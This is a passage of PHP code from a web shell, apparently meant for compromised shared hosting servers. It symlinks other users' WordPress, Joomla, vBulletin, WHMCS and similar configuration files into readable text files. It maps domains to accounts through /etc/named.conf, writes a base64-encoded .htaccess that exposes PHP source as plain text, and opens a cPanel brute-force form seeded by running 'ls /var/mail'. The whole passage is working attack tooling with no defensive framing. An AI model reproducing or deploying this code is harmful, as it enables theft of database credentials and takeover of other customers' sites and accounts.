$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home5/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home6/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home7/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t}\r\n\r\n\t\t\t\t$d0mains = @file("/etc/named.conf");\r\n\t\t\r\n\t\t\t\tif($d0mains)\r\n\t\t\t\t{\r\n\t\t\t\t\tmkdir($fn);\r\n\t\t\t\t\tchdir($fn);\r\n\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t\tforeach($d0mains as $d0main)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif(eregi("zone",$d0main))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tpreg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n\t\t\t\t\t\t\tflush();\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tif(strlen(trim($domains[1][0])) > 2)\r\n\t\t\t\t\t\t\t{ \r\n\t\t\t\t\t\t\t\t$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\tsyml($user[\'name\'],$domains[1][0]);\t\t\t\t\t\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo "<center><font color=lime size=3>[ Done ]</font></center>";\r\n\t\t\t\t\techo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; \r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tmkdir($fn);\r\n\t\t\t\t\tchdir($fn);\r\n\t\t\t\t\t$temp = "";\r\n\t\t\t\t\t$val1 = 0;\r\n\t\t\t\t\t$val2 = 1000;\r\n\t\t\t\t\tfor(;$val1 <= $val2;$val1++) \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$uid = @posix_getpwuid($val1);\r\n\t\t\t\t\t\tif ($uid)\r\n\t\t\t\t\t\t\t$temp .= join(\':\',$uid)."\\n";\r\n\t\t\t\t\t }\r\n\t\t\t\t\t echo \'<br/>\';\r\n\t\t\t\t\t $temp = trim($temp);\r\n\t\t\t\t\t \r\n\t\t\t\t\t $file5 = fopen("test.txt","w");\r\n\t\t\t\t\t fputs($file5,$temp);\r\n\t\t\t\t\t fclose($file5);\r\n\r\n$htaccess =\r\n\'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh\r\naW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp\r\nbiAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=\r\n\';\r\n$file = fopen(".htaccess","w+");\r\n$write = fwrite ($file ,base64_decode($htaccess));\r\n\t\t\t\t\t \r\n\t\t\t\t\t $file = fopen("test.txt", "r") or exit("Unable to open file!");\r\n\t\t\t\t\t while(!feof($file))\r\n\t\t\t\t\t {\r\n\t\t\t\t\t\t$s = fgets($file);\r\n\t\t\t\t\t\t$matches = array();\r\n\t\t\t\t\t\t$t = preg_match(\'/\\/(.*?)\\:\\//s\', $s, $matches);\r\n\t\t\t\t\t\t$matches = str_replace("home/","",$matches[1]);\r\n\t\t\t\t\t\tif(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\tsyml($matches,$matches);\r\n\t\t\t\t\t }\r\n\t\t\t\t\tfclose($file);\r\n\t\t\t\t\techo "</table>";\r\n\t\t\t\t\tunlink("test.txt");\r\n\t\t\t\t\techo "<center><font color=lime size=3>[ Done ]</font></center>";\r\n\t\t\t\t\techo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; \r\n\t\t\t\t}\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\n?>\r\n<form method="POST" target="_blank">\r\n\t<strong>\r\n<input name="page" type="hidden" value="find"><table>      \t\t\t\t\r\n    </strong><br><br><center><font size="5" style="italic" color="#00ff00">=[ Cpanel BruteForce ]=</font></center><br><br>\r\n    <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">\r\n\t<tr>\r\n\t<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<center><b><font size="5" style="italic" color="#00ff00">Cpanel BruteForce</font></b></center></td></tr>\r\n    <tr>\r\n    <td>\r\n    <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>User :</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class =\'inputz\' rows="10" name="usernames"><?php system(\'ls /var/mail\');?></textarea></strong></td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>Pass :</strong></td>\r\n    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class =\'inputz\' rows="10" name="passwords"></textarea></strong></td>\r\n    </tr>\r\n    <tr>\r\n    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">\r\n\t<strong>Type 